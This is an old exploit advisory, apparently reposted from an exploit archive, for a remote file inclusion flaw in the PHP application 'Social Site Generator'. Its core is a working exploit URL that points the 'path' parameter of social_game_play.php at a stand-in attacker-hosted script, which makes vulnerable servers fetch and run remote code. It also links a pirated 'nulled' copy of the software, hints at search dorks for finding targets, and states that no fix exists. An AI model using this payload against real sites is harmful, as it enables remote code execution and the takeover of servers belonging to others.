Social Site Generator (path) Remote File Inclusion Vulnerability

2008-05-31 00:00:00

< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name : Social Site Generator
#
# Download : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type : RFI (remote file include)
#
# Dork : search it :p
#
# Vulnerable file : social_game_play.php
#
# author : vBmad
#
# Team : nab3 Team & hamama team
#
# Greatz : ALLAH
# rouchtekh & jonelo & okx all hackerz moroccan & bigg thnx to my teacher Roi-PhP
# www.nab3i.com & www.nab3.2007.fr & www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
\ / |
\ / [email protected] |
\/__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.